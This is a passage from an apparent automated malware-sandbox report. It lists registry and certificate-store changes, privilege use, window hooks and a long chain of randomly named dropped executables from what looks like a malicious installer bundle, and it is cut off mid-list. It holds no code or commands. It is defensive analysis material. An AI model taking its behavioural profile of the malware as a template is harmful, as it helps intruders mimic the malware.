\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.Default\Software\Microsoft\IdentityCRL\WnfLastTimeStamps svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"11\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n" svchost.exe -
Modifies registry class 5 IoCs
Processes:
CrowdInspect.sfx.exeSettings.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ CrowdInspect.sfx.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ CrowdInspect.sfx.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ CrowdInspect.sfx.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ CrowdInspect.sfx.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{E584FF88-EC9D-4E53-92B9-109F6A44962F} Settings.exe -
Processes:
setting.exeinstaller.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E setting.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd setting.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c000000010000000400000000100000190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254830400000001000000100000001bfe69d191b71933a372a80fe155e5b52000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd setting.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeCrowdInspect64.exepid process 4024 msedge.exe 4024 msedge.exe 4284 msedge.exe 4284 msedge.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe 1816 CrowdInspect64.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
CrowdInspect64.exepid process 1816 CrowdInspect64.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
Processes:
msedge.exemsedge.exepid process 4284 msedge.exe 4284 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe 232 msedge.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
WinHoster.exepid process 6236 WinHoster.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exeCrowdInspect64.exedescription pid process Token: SeSystemtimePrivilege 3816 svchost.exe Token: SeSystemtimePrivilege 3816 svchost.exe Token: SeIncBasePriorityPrivilege 3816 svchost.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe Token: SeDebugPrivilege 1816 CrowdInspect64.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
msedge.exeMon114917d808c86e0ba.tmpsetup.tmpmsedge.exesetting.exeinstaller.exeCalculator.exeSettings.exepid process 4284 msedge.exe 4284 msedge.exe 4004 Mon114917d808c86e0ba.tmp 4616 setup.tmp 232 msedge.exe 1436 setting.exe 3068 installer.exe 7900 Calculator.exe 4376 Settings.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
CrowdInspect.sfx.exeCrowdInspect.exeCrowdInspect64.exeCrowdInspect.exeCrowdInspect.exeCrowdInspect.exeCrowdInspect.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeMon112c3d79b6fdf8.exeMon11991188390d59.exeMon114917d808c86e0ba.exeMon1190ed9443.exeMon1173d8f84c056.exepostback.exeMon11a9d578c6.exeMon114917d808c86e0ba.exeMon114917d808c86e0ba.tmpMon11a22bde2b.exeinst1.exeConhost.exeQPeacnpa5OCyBgRir69RuR8o.exeWQ_0DNHwegoB5QOHvlIZntSr.exeIj6YtsqVdlgwgUz3rMkCp0mj.exeQPeacnpa5OCyBgRir69RuR8o.exeGBI_yH9a9U9c0kT8e_JoFRwy.exefLt5aaWDMdJHJUJsdaAbuivD.exebrLy3TAdoOEVkJuOS7U49MCH.exePro.exep9IkKDDHEvPP_0EBsFu2v6aq.exexWDw4KvnprXoiUalqAVdu3zs.exeCalculator.exewmiprvse.exemsiexec.exe4mulY6HX0OKjNh4y5va_iEdo.exeConhost.exesetup.exeIj6YtsqVdlgwgUz3rMkCp0mj.execmd.exeConhost.exesetup.tmpschtasks.exeWMIADAP.EXEsetup_2.executm3.exesetup.exeextd.exesetup.tmpinst3.exeZNjEhM7gVrAAxuwEiyqOJ34t.exepowershell.exetimeout.exeextd.exepostback.exeAppLaunch.execmd.exeLzmwAqmV.exeEASS.exetDQQVMK4kh5kC_VXdu6mwGw2.exeAs_7_fJ9jiliYff_bkd0HLSb.exepowershell.exepid process 3532 CrowdInspect.sfx.exe 3532 CrowdInspect.sfx.exe 1628 CrowdInspect.exe 1816 CrowdInspect64.exe 4640 CrowdInspect.exe 3908 CrowdInspect.exe 4788 CrowdInspect.exe 4860 CrowdInspect.exe 3512 setup_x86_x64_install.exe 4656 setup_installer.exe 1356 setup_install.exe 852 Mon112c3d79b6fdf8.exe 1416 Mon11991188390d59.exe 4808 Mon114917d808c86e0ba.exe 1248 Mon1190ed9443.exe 1900 Mon1173d8f84c056.exe 5000 postback.exe 4060 Mon11a9d578c6.exe 1220 Mon114917d808c86e0ba.exe 4004 Mon114917d808c86e0ba.tmp 2672 Mon11a22bde2b.exe 5000 postback.exe 4868 inst1.exe 3056 Conhost.exe 408 QPeacnpa5OCyBgRir69RuR8o.exe 3700 WQ_0DNHwegoB5QOHvlIZntSr.exe 3204 Ij6YtsqVdlgwgUz3rMkCp0mj.exe 5196 QPeacnpa5OCyBgRir69RuR8o.exe 5204 GBI_yH9a9U9c0kT8e_JoFRwy.exe 5320 fLt5aaWDMdJHJUJsdaAbuivD.exe 5336 brLy3TAdoOEVkJuOS7U49MCH.exe 1452 Pro.exe 5148 p9IkKDDHEvPP_0EBsFu2v6aq.exe 5484 xWDw4KvnprXoiUalqAVdu3zs.exe 5492 Calculator.exe 5212 wmiprvse.exe 5688 msiexec.exe 5856 4mulY6HX0OKjNh4y5va_iEdo.exe 5904 Conhost.exe 5812 setup.exe 6000 Ij6YtsqVdlgwgUz3rMkCp0mj.exe 6044 cmd.exe 6060 